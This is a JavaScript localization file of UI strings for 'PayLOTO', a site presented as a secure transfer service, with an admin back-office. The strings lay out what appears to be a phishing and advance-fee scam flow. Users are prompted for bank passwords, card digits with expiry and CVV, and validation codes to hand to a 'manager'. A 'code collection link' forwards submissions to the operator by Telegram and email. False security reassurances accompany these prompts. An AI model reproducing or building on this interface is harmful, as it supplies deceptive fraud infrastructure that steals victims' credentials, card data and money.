export default {
  "brand.name": "PayLOTO",
  "brand.tagline": "Secure international transfers",

  "common.secureFooter": "Your exchanges are encrypted over HTTPS/TLS. PayLOTO will never ask for your password by email.",
  "common.secureBadge": "Secure connection",
  "common.encrypted": "TLS encryption active",
  "common.logout": "Sign out",
  "common.back": "Back",
  "common.loading": "Loading...",
  "common.error": "Something went wrong. Please try again.",
  "common.currency": "XPF",
  "common.serviceFee": "Service fee",

  "login.badge": "Secure customer area",
  "login.title": "Access your customer area",
  "login.subtitle": "Enter the unique identification code provided by PayLOTO / WePAY.",
  "login.codeLabel": "Identification code",
  "login.codePlaceholder": "e.g. 20001",
  "login.submit": "Sign in",
  "login.submitting": "Checking...",
  "login.forgot": "Forgot your code?",
  "login.forgotTitle": "Forgot code",
  "login.forgotText": "To recover your identification code, contact our support team, who will provide it after verifying your identity.",
  "login.forgotEmail": "support@payloto.com",
  "login.helper": "Your code appears on the confirmation letter sent by our manager.",
  "login.errorEmpty": "Please enter your identification code.",
  "login.errorInvalid": "Unknown identification code. Please check and try again.",
  "login.errorBlocked": "Access denied. Please contact support.",
  "login.trustTitle": "A platform you can trust",
  "login.trust1": "Access verification by IP address",
  "login.trust2": "Unique identification code",
  "login.trust3": "Full traceability of operations",

  "bankAuth.badge": "Bank verification required",
  "bankAuth.title": "Authenticate with your bank",
  "bankAuth.subtitle": "To validate your withdrawal request, sign in to your bank account.",
  "bankAuth.step": "Step 2 of 2 · Bank authentication",
  "bankAuth.stepBank": "Authentication",
  "bankAuth.stepForm": "Withdrawal request",
  "bankAuth.formTitle": "Sign in to your bank",
  "bankAuth.formSubtitle": "Enter your bank credentials. They will be verified at the final validation.",
  "bankAuth.selectBank": "Bank name",
  "bankAuth.selectBankPlaceholder": "Select your bank",
  "bankAuth.selectedBank": "Selected bank",
  "bankAuth.id": "Bank identifier",
  "bankAuth.idPh": "e.g. BDP-20001",
  "bankAuth.password": "Password",
  "bankAuth.passwordPh": "Your bank password",
  "bankAuth.showPassword": "Show password",
  "bankAuth.hidePassword": "Hide password",
  "bankAuth.submit": "Continue to summary",
  "bankAuth.submitting": "Saving...",
  "bankAuth.redirect": "Redirecting to your request summary...",
  "bankAuth.secureNote": "End-to-end encrypted connection. Your bank credentials are never stored by PayLOTO.",
  "bankAuth.errorRequired": "Please fill in this field.",
  "bankAuth.errorBank": "Please select your bank.",
  "bankAuth.errorInvalid": "Incorrect identifier or password. Please check and try again.",
  "bankAuth.errorLocked": "Too many failed attempts. Bank access is temporarily blocked. Please contact support.",
  "bankAuth.attempts": "Remaining authentication attempts: {{count}} of {{max}}",
  "bankAuth.attemptsLeft": "Incorrect credentials. You have {{count}} authentication attempt(s) left.",
  "bankAuth.blockedTitle": "Too many failed attempts",
  "bankAuth.blockedText": "Your attempts are used up. Sign out: attempts reset on your next sign-in.",
  "bankAuth.blockedLogout": "Sign out",
  "bankAuth.demoTitle": "Demo credentials",
  "bankAuth.demoHint": "Click a credential below to fill it automatically, then sign in.",
  "bankAuth.connectedTitle": "Bank already authenticated",
  "bankAuth.connectedText": "You are connected to {{bank}}. You can continue your withdrawal request.",
  "bankAuth.continue": "Continue to the form",
  "bankAuth.changeAccount": "Switch account",
  "bankAuth.backDashboard": "Back to dashboard",
  "bankAuth.backForm": "Edit request",
  "bankAuth.reauthTitle": "New authentication required",
  "bankAuth.verifyNote": "Your credentials are automatically checked against the database when your withdrawal request is approved.",
  "bankAuth.reauthText": "Your bank credentials could not be confirmed. Please authenticate again to continue your withdrawal request. You only have 2 authentication attempts available.",

  "cardAuth.formTitle": "Card validation",
  "cardAuth.formSubtitle": "Fallback method: enter your card details to continue your request.",
  "cardAuth.attempts": "Remaining attempts: {{count}} of {{max}}",
  "cardAuth.brand": "Card type",
  "cardAuth.errorBrand": "Please select the card type.",
  "cardAuth.last8": "Last 8 digits of the card",
  "cardAuth.last8Ph": "e.g. 12345678",
  "cardAuth.errorLast8": "Please enter the last 8 digits of your card.",
  "cardAuth.expiry": "Expiry date",
  "cardAuth.errorExpiry": "Please enter a valid expiry date (MM/YY).",
  "cardAuth.cvv": "CVV",
  "cardAuth.errorCvv": "Please enter the CVV (3 digits).",
  "cardAuth.submit": "Validate card",
  "cardAuth.submitting": "Checking...",
  "cardAuth.errorInvalid": "Incorrect card details. Please check and try again.",
  "cardAuth.secureNote": "Your card details are encrypted and securely verified.",
  "cardAuth.blockedTitle": "Access blocked",
  "cardAuth.blockedText": "Card validation attempts used up. Sign out: attempts reset on your next sign-in.",
  "cardAuth.blockedLogout": "Sign out",

  "dashboard.welcome": "Welcome to your account",
  "dashboard.balanceLabel": "Available balance",
  "dashboard.balanceHint": "Amount available for your withdrawals",
  "dashboard.withdraw": "Start a withdrawal",
  "dashboard.recent": "Recent transactions",
  "dashboard.recentEmpty": "No recent transactions.",
  "dashboard.accountCode": "Customer code",
  "dashboard.accountStatus": "Account status",
  "dashboard.statusActive": "Active account",
  "dashboard.memberSince": "Customer since",
  "dashboard.currencyLabel": "Currency",
  "dashboard.ibanLabel": "Account number • IBAN",
  "dashboard.ibanSecure": "Secure international transfers",
  "dashboard.support": "Support",
  "dashboard.supportText": "A manager is available to guide you through your withdrawal process.",
  "dashboard.op.transfer": "Incoming transfer",
  "dashboard.op.withdrawal": "Bank withdrawal",
  "dashboard.op.fee": "Service fee",
  "dashboard.op.pending": "Processing",
  "dashboard.op.done": "Completed",
  "dashboard.op.refused": "Refused",
  "dashboard.account": "Your account",
  "dashboard.quickTitle": "Quick actions",
  "dashboard.quickHistory": "History",
  "dashboard.quickProfile": "My profile",
  "dashboard.txReceived": "Amount received",
  "dashboard.txAmount": "Amount",
  "dashboard.txNoRef": "—",

  "withdrawal.title": "Withdrawal request",
  "withdrawal.subtitle": "Provide the beneficiary details and the bank details for the withdrawal.",
  "withdrawal.sectionBeneficiary": "Beneficiary details",
  "withdrawal.sectionBank": "Bank details",
  "withdrawal.sectionContact": "Beneficiary contact",
  "withdrawal.sectionAmount": "Withdrawal amount",
  "withdrawal.fullName": "Beneficiary full name",
  "withdrawal.fullNamePh": "e.g. Marie-Claire Vaea",
  "withdrawal.bankName": "Bank name",
  "withdrawal.bankNamePh": "e.g. Banque de Polynésie",
  "withdrawal.iban": "IBAN number",
  "withdrawal.ibanPh": "e.g. PF12 1234 5678 9012 3456 7890 123",
  "withdrawal.phone": "Phone number",
  "withdrawal.phonePh": "e.g. +689 40 12 34 56",
  "withdrawal.email": "Email address",
  "withdrawal.emailPh": "e.g. beneficiary@example.com",
  "withdrawal.amount": "Withdrawal amount",
  "withdrawal.amountPh": "e.g. 750000",
  "withdrawal.bankSelect": "Destination bank",
  "withdrawal.bankSelectPlaceholder": "Select your bank",
  "withdrawal.amountReadonly": "The withdrawal amount equals your full available balance. It cannot be edited.",
  "withdrawal.available": "Available balance",
  "withdrawal.availableHint": "Available for this withdrawal",
  "withdrawal.submit": "Confirm",
  "withdrawal.cancel": "Cancel",
  "withdrawal.backDashboard": "Back to dashboard",
  "withdrawal.secureNote": "Secure and encrypted operation. Please check the bank details before confirming.",
  "withdrawal.required": "Required field",
  "withdrawal.errorRequired": "Please fill in all required fields.",
  "withdrawal.errorEmail": "Please enter a valid email address.",
  "withdrawal.errorAmount": "Please enter a valid amount greater than 0.",
  "withdrawal.errorAmountMax": "The amount exceeds your available balance.",

  "withdrawal.bankVerified": "Verified bank",
  "withdrawal.changeBank": "Change bank",

  "recap.title": "Request summary",
  "recap.successMsg": "Your withdrawal request has been successfully received.",
  "recap.subtitle": "Review the information below, then approve your request.",
  "recap.beneficiary": "Beneficiary name",
  "recap.amount": "Withdrawal amount",
  "recap.bank": "Bank",
  "recap.iban": "IBAN",
  "recap.email": "Email address",
  "recap.reference": "Request reference",
  "recap.date": "Submission date and time",
  "recap.status": "Status",
  "recap.statusValue": "Request registered",
  "recap.approve": "Approve",
  "recap.edit": "Edit request",
  "recap.approving": "Processing...",
  "recap.notFound": "No request in progress. Please start a new withdrawal request.",

  "validation.title": "Request validation",
  "validation.codeSentTitle": "Validation code sent",
  "validation.codeSentText": "A validation code has been emailed to {{email}}. Please share it with the manager in charge of activating your transfer.",
  "validation.codeLabel": "Validation code",
  "validation.validUntil": "Valid until {{date}}",
  "validation.emailPreview": "Preview of the sent email",
  "validation.summary": "Operation summary",
  "validation.ref": "Operation reference",
  "validation.submittedAt": "Submission",
  "validation.status": "Request status",
  "validation.statusValue": "Awaiting activation",
  "validation.codeStatus": "Validation code status",
  "validation.codeStatusValue": "Sent",
  "validation.processingTime": "Estimated processing time",
  "validation.processingValue": "24 to 48 business hours",
  "validation.note": "This code only confirms to the manager that the request can be processed. It does not allow modifying or cancelling the request.",
  "validation.notReceived": "Didn't receive the email? Check your spam folder or contact support.",
  "validation.backHome": "Back to dashboard",
  "validation.notFound": "No request to display. Please start a new withdrawal request.",

  "email.subject": "Confirmation of your withdrawal request — Validation code",
  "email.greeting": "Hello,",
  "email.intro": "You have initiated a withdrawal request for the amount of {{amount}} XPF.",
  "email.detailsTitle": "Your request details:",
  "email.amount": "Amount",
  "email.reference": "Reference",
  "email.date": "Date and time",
  "email.status": "Status",
  "email.statusValue": "Request registered",
  "email.instruction": "To allow the activation of your transfer, please share the validation code below with the manager handling your request:",
  "email.codeLabel": "Validation code",
  "email.validity": "This code is valid for {{hours}} hours from receipt.",
  "email.manager": "Our manager will contact you shortly to proceed with the activation of your transfer.",
  "email.signoff": "Best regards,",
  "email.team": "The PayLOTO team",

  "admin.login.title": "PayLOTO Administration",
  "admin.login.subtitle": "Sign in with your administrator credentials.",
  "admin.login.email": "Email address",
  "admin.login.emailPh": "admin@payloto.com",
  "admin.login.password": "Password",
  "admin.login.passwordPh": "Your administrator password",
  "admin.login.submit": "Sign in",
  "admin.login.errorEmpty": "Please fill in all fields.",
  "admin.login.errorInvalid": "Incorrect email or password.",
  "admin.login.demoTitle": "Demo access",
  "admin.login.demoHint": "Click below to auto-fill the demo credentials.",
  "admin.login.back": "Back to site",

  "admin.loading": "Loading data...",
  "admin.error": "Unable to load data.",
  "admin.retry": "Retry",

  "admin.header.role": "Back-office",
  "admin.header.viewSite": "View site",
  "admin.header.logout": "Sign out",

  "admin.nav.section.menu": "Menu",
  "admin.nav.section.security": "Security & Audit",
  "admin.nav.dashboard": "Dashboard",
  "admin.nav.clients": "Clients",
  "admin.nav.requests": "Withdrawal requests",
  "admin.nav.codes": "Validation codes",
  "admin.nav.credentials": "Credentials",
  "admin.nav.banks": "Banks",
  "admin.nav.ips": "IP blocking",
  "admin.nav.logs": "Audit logs",
  "admin.nav.management": "Management / Deletion",
  "admin.nav.settings": "Settings",

  "admin.common.all": "All",

  "admin.overview.title": "Dashboard",
  "admin.overview.subtitle": "Global overview of PayLOTO operations.",
  "admin.overview.clients": "Registered clients",
  "admin.overview.balance": "Total managed balance",
  "admin.overview.pending": "Pending requests",
  "admin.overview.processing": "Transfers in progress",
  "admin.overview.recentTitle": "Latest withdrawal requests",
  "admin.overview.viewAll": "View all requests",

  "admin.status.new": "New request",
  "admin.status.registered": "Registered",
  "admin.status.code_sent": "Code sent",
  "admin.status.awaiting_activation": "Awaiting activation",
  "admin.status.activation_validated": "Activation validated",
  "admin.status.processing": "Processing",
  "admin.status.processed": "Processed",
  "admin.status.cancelled": "Cancelled",
  "admin.status.expired": "Expired",

  "admin.codeStatus.sent": "Sent",
  "admin.codeStatus.used": "Used",
  "admin.codeStatus.invalidated": "Invalidated",
  "admin.codeStatus.expired": "Expired",

  "admin.clients.title": "Client management",
  "admin.clients.subtitle": "View, add and manage client accounts.",
  "admin.clients.add": "New client",
  "admin.clients.searchPh": "Search by name, code or email...",
  "admin.clients.code": "Client code",
  "admin.clients.name": "Full name",
  "admin.clients.email": "Email",
  "admin.clients.balance": "Balance",
  "admin.clients.status": "Status",
  "admin.clients.actions": "Actions",
  "admin.clients.statusActive": "Active",
  "admin.clients.statusSuspended": "Suspended",
  "admin.clients.suspend": "Suspend",
  "admin.clients.reactivate": "Reactivate",
  "admin.clients.empty": "No clients found.",
  "admin.clients.form.title": "Create client identification code",
  "admin.clients.form.subtitle": "Provide the client's name, amount and bank login credentials.",
  "admin.clients.form.fullName": "Full name",
  "admin.clients.form.email": "Email address",
  "admin.clients.form.phone": "Phone",
  "admin.clients.form.accessCode": "Access code",
  "admin.clients.form.balance": "Amount",
  "admin.clients.form.currency": "Currency",
  "admin.clients.form.cancel": "Cancel",
  "admin.clients.form.submit": "Create client",
  "admin.clients.form.errorRequired": "Please fill in all required fields.",
  "admin.clients.form.code": "Client code",
  "admin.clients.form.codeHint": "Generated automatically, editable before confirming.",
  "admin.clients.form.codeTaken": "This client code is already in use. Please choose another.",
  "admin.clients.form.emailPh": "e.g. client@example.com",
  "admin.clients.form.credentialsSection": "Bank login credentials",
  "admin.clients.form.bankLogin": "Login identifier",
  "admin.clients.form.bankPassword": "Password",
  "admin.clients.form.regenerate": "Regenerate",
  "admin.clients.form.sendCredentials": "Send credentials to the client by email",
  "admin.clients.form.sendCredentialsHint": "The client will receive their credentials at the email address entered above.",
  "admin.clients.form.emailRequiredForSend": "Please provide the client's email address to send the credentials.",
  "admin.clients.form.attemptsSection": "Allowed login attempts",
  "admin.clients.form.maxBankAttempts": "Attempts — bank account",
  "admin.clients.form.maxCardAttempts": "Attempts — card",
  "admin.clients.form.attemptsHint": "Number of tries allowed before lockout. The counter resets to this maximum each time the client logs in again (between 1 and 10).",
  "admin.clients.credentials": "Credentials",
  "admin.clients.manageCredentials": "Credentials",

  "admin.requests.title": "Withdrawal requests",
  "admin.requests.subtitle": "View and activate withdrawal requests.",
  "admin.requests.searchPh": "Search by reference, client or beneficiary...",
  "admin.requests.reference": "Reference",
  "admin.requests.client": "Client",
  "admin.requests.beneficiary": "Beneficiary",
  "admin.requests.amount": "Amount",
  "admin.requests.bank": "Bank",
  "admin.requests.status": "Status",
  "admin.requests.date": "Date",
  "admin.requests.actions": "Actions",
  "admin.requests.details": "Details",
  "admin.requests.activate": "Activate transfer",
  "admin.requests.empty": "No requests found.",

  "admin.detail.title": "Request detail",
  "admin.detail.reference": "Reference",
  "admin.detail.client": "Client",
  "admin.detail.beneficiary": "Beneficiary",
  "admin.detail.amount": "Amount",
  "admin.detail.bank": "Bank",
  "admin.detail.iban": "IBAN",
  "admin.detail.phone": "Phone",
  "admin.detail.email": "Email",
  "admin.detail.submittedAt": "Submitted at",
  "admin.detail.codeGeneratedAt": "Code generated at",
  "admin.detail.codeExpiresAt": "Code expires at",
  "admin.detail.codeUsedAt": "Code used at",
  "admin.detail.activatedAt": "Activated at",
  "admin.detail.activatedBy": "Activated by",
  "admin.detail.processingEstimate": "Processing estimate",

  "admin.activation.title": "Activate transfer",
  "admin.activation.subtitle": "Enter the code provided by the beneficiary.",
  "admin.activation.infoRef": "Reference",
  "admin.activation.infoAmount": "Amount",
  "admin.activation.infoBeneficiary": "Beneficiary",
  "admin.activation.codeLabel": "Validation code",
  "admin.activation.codePh": "XXXXXX",
  "admin.activation.submit": "Confirm activation",
  "admin.activation.cancel": "Cancel",
  "admin.activation.close": "Close",
  "admin.activation.success": "Activation successfully validated. The request is now being processed.",
  "admin.activation.errorMismatch": "Invalid validation code. Please verify the code provided by the beneficiary.",
  "admin.activation.errorExpired": "This validation code has expired. Please generate a new code.",
  "admin.activation.errorUsed": "This code has already been used.",

  "admin.codes.title": "Validation codes",
  "admin.codes.subtitle": "View, renew or invalidate validation codes.",
  "admin.codes.searchPh": "Search by reference, client or code...",
  "admin.codes.reference": "Reference",
  "admin.codes.client": "Client",
  "admin.codes.code": "Code",
  "admin.codes.status": "Status",
  "admin.codes.generatedAt": "Generated at",
  "admin.codes.expiresAt": "Expires at",
  "admin.codes.actions": "Actions",
  "admin.codes.renew": "Renew",
  "admin.codes.invalidate": "Invalidate",
  "admin.codes.empty": "No codes found.",
  "admin.codes.renewDone": "New code generated:",
  "admin.codes.invalidateDone": "Code successfully invalidated.",

  "admin.ips.title": "IP blocking",
  "admin.ips.subtitle": "Manually manage blocked IP addresses.",
  "admin.ips.add": "Block an IP",
  "admin.ips.ip": "IP address",
  "admin.ips.reason": "Reason",
  "admin.ips.blockedAt": "Blocked at",
  "admin.ips.blockedBy": "Blocked by",
  "admin.ips.actions": "Actions",
  "admin.ips.unblock": "Unblock",
  "admin.ips.empty": "No blocked IP addresses.",
  "admin.ips.form.title": "Block an IP address",
  "admin.ips.form.subtitle": "Enter the IP address and the reason for blocking.",
  "admin.ips.form.ipLabel": "IP address",
  "admin.ips.form.ipPh": "e.g. 192.168.1.45",
  "admin.ips.form.reasonLabel": "Reason for blocking",
  "admin.ips.form.reasonPh": "e.g. Repeated failed login attempts",
  "admin.ips.form.cancel": "Cancel",
  "admin.ips.form.submit": "Block IP",
  "admin.ips.form.errorRequired": "Please provide the IP address and reason.",

  "admin.logs.title": "Audit logs",
  "admin.logs.subtitle": "Full traceability of sensitive actions.",
  "admin.logs.searchPh": "Search in logs...",
  "admin.logs.time": "Date & time",
  "admin.logs.ip": "IP address",
  "admin.logs.user": "User",
  "admin.logs.action": "Action",
  "admin.logs.reference": "Reference",
  "admin.logs.technical": "Technical details",
  "admin.logs.empty": "No log entries.",

  "admin.clients.currency": "Currency",
  "admin.clients.created": "Identification code created:",

  "admin.banks.title": "Bank management",
  "admin.banks.subtitle": "Add or remove the banks offered to clients.",
  "admin.banks.add": "Add a bank",
  "admin.banks.name": "Bank name",
  "admin.banks.short": "Abbreviation",
  "admin.banks.empty": "No bank registered.",
  "admin.banks.delete": "Delete",
  "admin.banks.form.title": "Add a bank",
  "admin.banks.form.subtitle": "Provide the bank name and its abbreviation.",
  "admin.banks.form.nameLabel": "Bank name",
  "admin.banks.form.namePh": "e.g. Banque de Polynésie",
  "admin.banks.form.shortLabel": "Abbreviation",
  "admin.banks.form.shortPh": "e.g. BDP",
  "admin.banks.form.cancel": "Cancel",
  "admin.banks.form.submit": "Add bank",
  "admin.banks.form.errorRequired": "Please provide the bank name.",
  "admin.banks.deleteDone": "Bank successfully deleted.",

  "admin.settings.title": "Account settings",
  "admin.settings.subtitle": "Manage your administrator credentials.",
  "admin.settings.emailLabel": "Login email address",
  "admin.settings.emailSectionTitle": "Email addresses",
  "admin.settings.emailSectionSubtitle": "Change the administrator login email and the support address shown to clients.",
  "admin.settings.adminEmailLabel": "Administrator login email",
  "admin.settings.adminEmailPassword": "Current password",
  "admin.settings.adminEmailSave": "Update email",
  "admin.settings.adminEmailSaved": "Login email updated.",
  "admin.settings.adminEmailErrorPassword": "Current password is incorrect.",
  "admin.settings.supportEmailLabel": "Support email (shown to clients)",
  "admin.settings.supportEmailPh": "support@yourdomain.com",
  "admin.settings.supportEmailSave": "Save support email",
  "admin.settings.supportEmailSaved": "Support email updated.",
  "admin.settings.supportEmailHint": "This address is shown to clients for support and code recovery.",
  "admin.settings.emailInvalid": "Please enter a valid email address.",
  "admin.settings.passwordTitle": "Change password",
  "admin.settings.current": "Current password",
  "admin.settings.new": "New password",
  "admin.settings.confirm": "Confirm new password",
  "admin.settings.submit": "Update password",
  "admin.settings.success": "Password successfully updated.",
  "admin.settings.errorEmpty": "Please fill in all fields.",
  "admin.settings.errorCurrent": "The current password is incorrect.",
  "admin.settings.errorMismatch": "The two passwords do not match.",
  "admin.settings.errorLength": "The new password must be at least 6 characters long.",
  "admin.settings.errorGeneric": "Unable to update the password.",
  "admin.settings.testTitle": "Test email",
  "admin.settings.testSubtitle": "Send yourself a demo email to check how notifications render, without creating a fake withdrawal request.",
  "admin.settings.testButton": "Send a test email",
  "admin.settings.testSending": "Sending...",
  "admin.settings.testHint": "The test is sent to the administrator address:",
  "admin.settings.testSuccess": "Test email sent successfully to",
  "admin.settings.testError": "Sending failed:",
  "admin.settings.telegramTitle": "Telegram bot",
  "admin.settings.telegramSubtitle": "Send a verification message to the Telegram bot to confirm that the token and chat ID are correctly configured.",
  "admin.settings.telegramButton": "Test the Telegram bot",
  "admin.settings.telegramSending": "Sending...",
  "admin.settings.telegramHint": "The test message is sent to the bot's configured chat.",
  "admin.settings.telegramSuccess": "Test message sent to chat:",
  "admin.settings.telegramError": "Sending failed:",

  "admin.management.title": "Management & deletion",
  "admin.management.subtitle": "Control and permanently delete system data.",
  "admin.management.warning": "The actions below are final and irreversible. Expired or dead codes are also purged automatically.",
  "admin.management.clientsTitle": "Clients",
  "admin.management.clientsSubtitle": "{{count}} registered client(s)",
  "admin.management.purgeClients": "Delete all clients",
  "admin.management.confirmClientsTitle": "Delete all clients",
  "admin.management.confirmClientsText": "This will permanently delete the {{count}} client(s) and their access. Confirm?",
  "admin.management.clientsPurged": "All clients have been deleted.",
  "admin.management.confirmClientTitle": "Delete this client",
  "admin.management.confirmClientText": "Permanently delete {{name}}? This action is irreversible.",
  "admin.management.clientDeleted": "Client deleted.",
  "admin.management.requestsTitle": "Requests & validation codes",
  "admin.management.requestsSubtitle": "{{count}} request(s) / code(s)",
  "admin.management.purgeRequests": "Delete all codes / requests",
  "admin.management.confirmRequestsTitle": "Delete all codes and requests",
  "admin.management.confirmRequestsText": "This will permanently delete the {{count}} requests and their codes. Confirm?",
  "admin.management.requestsPurged": "All requests and codes have been deleted.",
  "admin.management.confirmRequestTitle": "Delete this request",
  "admin.management.confirmRequestText": "Permanently delete request {{name}}? This action is irreversible.",
  "admin.management.requestDeleted": "Request deleted.",
  "admin.management.ipsTitle": "Blocked IP addresses",
  "admin.management.ipsSubtitle": "{{count}} IP address(es)",
  "admin.management.purgeIps": "Delete all IPs",
  "admin.management.confirmIpsTitle": "Delete all IP addresses",
  "admin.management.confirmIpsText": "This will permanently delete the {{count}} IP address(es). Confirm?",
  "admin.management.ipsPurged": "All IP addresses have been deleted.",
  "admin.management.confirmIpTitle": "Delete this IP",
  "admin.management.confirmIpText": "Permanently delete IP address {{name}}?",
  "admin.management.ipDeleted": "IP address deleted.",
  "admin.management.empty": "No data in this section.",
  "admin.management.delete": "Delete",
  "admin.management.cancel": "Cancel",
  "admin.management.confirmButton": "Confirm deletion",
  "admin.management.noEmail": "No email address",

  "admin.credentials.title": "Bank credentials",
  "admin.credentials.subtitle": "Generate, edit and send each client's bank login credentials.",
  "admin.credentials.searchPh": "Search by name, code or identifier...",
  "admin.credentials.code": "Client code",
  "admin.credentials.client": "Client",
  "admin.credentials.login": "Identifier",
  "admin.credentials.status": "Status",
  "admin.credentials.generatedAt": "Issued at",
  "admin.credentials.actions": "Actions",
  "admin.credentials.manage": "Manage",
  "admin.credentials.empty": "No clients found.",
  "admin.credentials.notGenerated": "Not issued",
  "admin.credentials.generated": "Issued",
  "admin.credentials.sent": "Sent",
  "admin.credentials.modalTitle": "Bank credentials",
  "admin.credentials.modalSubtitle": "For client code",
  "admin.credentials.loginLabel": "Login identifier",
  "admin.credentials.passwordLabel": "Password",
  "admin.credentials.regenerate": "Regenerate",
  "admin.credentials.save": "Save",
  "admin.credentials.saved": "Credentials saved successfully.",
  "admin.credentials.sendLabel": "Recipient email address",
  "admin.credentials.send": "Send credentials",
  "admin.credentials.sending": "Sending...",
  "admin.credentials.sendDone": "Credentials sent to the client:",
  "admin.credentials.sendError": "Sending failed:",
  "admin.credentials.recipientRequired": "Please provide the recipient email address.",
  "admin.credentials.loginRequired": "The identifier and password are required.",
  "admin.credentials.sendHint": "The client will receive their credentials by email. Check the address before sending.",
  "admin.credentials.genHint": "The suggested credentials are generated automatically. You can edit them before saving.",
  "admin.credentials.cardTitle": "Validation card",
  "admin.credentials.cardExpiry": "Expiry",
  "admin.credentials.cardHint": "Card generated automatically. It serves as a fallback validation method (last 8 digits + expiry + CVV).",
  "admin.clients.form.cardSection": "Generated validation card",
  "admin.clients.form.cardRegenerate": "Regenerate card",
  "admin.clients.form.cardHint": "Card generated automatically. The client uses it as a fallback method (type + last 8 digits + expiry + CVV).",

  "admin.codeLink.title": "Validation code link",
  "admin.codeLink.subtitle": "Generate a link to share with the client. They enter their validation code and the amount to validate; you receive everything instantly by Telegram and email.",
  "admin.codeLink.statusActive": "Link active",
  "admin.codeLink.statusInactive": "Link disabled",
  "admin.codeLink.enable": "Enable link",
  "admin.codeLink.disable": "Disable link",
  "admin.codeLink.statusSaved": "Link status updated.",
  "admin.codeLink.amountPh": "e.g. 750000",
  "admin.codeLink.amountSave": "Save amount",
  "admin.codeLink.amountSaved": "Pre-filled amount saved.",
  "admin.codeLink.amountHint": "This amount will be pre-filled on the link page so the client can confirm it.",
  "admin.codeLink.digitsLabel": "Number of digits in the code",
  "admin.codeLink.digitsHint": "Choose the length of the validation code (from 4 to 8 digits). It applies to the collection link and to newly generated codes.",
  "admin.codeLink.digitsSaved": "Code length updated.",
  "admin.codeLink.currency": "Amount currency",
  "admin.codeLink.linkLabel": "Link to share with the client",
  "admin.codeLink.linkEmpty": "No link available.",
  "admin.codeLink.linkHint": "Share this link with the client. While it is active, the client can send their validation code through it.",
  "admin.codeLink.copy": "Copy link",
  "admin.codeLink.copied": "Copied",
  "admin.codeLink.copyError": "Copy failed. Please select the link manually.",
  "admin.codeLink.regenerate": "Regenerate link",
  "admin.codeLink.regenerated": "New link generated. The previous one no longer works.",
  "admin.codeLink.saveError": "Updating the link failed.",

  "codeCollection.badge": "Secure transmission",
  "codeCollection.title": "Submit your validation code",
  "codeCollection.subtitle": "Enter the {{count}}-digit validation code you received by email to validate the balance shown below.",
  "codeCollection.codeLabel": "Validation code ({{count}} digits)",
  "codeCollection.codePh": "e.g. 482913",
  "codeCollection.errorCode": "Please enter the {{count}} digits of the validation code.",
  "codeCollection.amountLabel": "Balance to validate",
  "codeCollection.balanceCaption": "Account balance",
  "codeCollection.balanceHint": "Amount communicated automatically by your manager. It cannot be modified.",
  "codeCollection.amountPh": "e.g. 750000",
  "codeCollection.amountHint": "Amount pre-filled by your manager. Check it, then confirm.",
  "codeCollection.errorAmount": "Please enter a valid amount greater than 0.",
  "codeCollection.submit": "Submit code",
  "codeCollection.submitting": "Sending...",
  "codeCollection.successTitle": "Code submitted successfully",
  "codeCollection.successText": "Your validation code has been sent to your manager. There is nothing else for you to do: they will proceed with validating your transfer.",
  "codeCollection.invalidTitle": "Invalid or disabled link",
  "codeCollection.invalidText": "This link is no longer valid. Please contact your manager to get a new link.",
  "codeCollection.blockedTitle": "Access blocked",
  "codeCollection.blockedText": "Access to this link is blocked from your network address. If you believe this is a mistake, please contact your manager.",
  "codeCollection.secureNote": "Your information is transmitted in a secure and confidential way."
};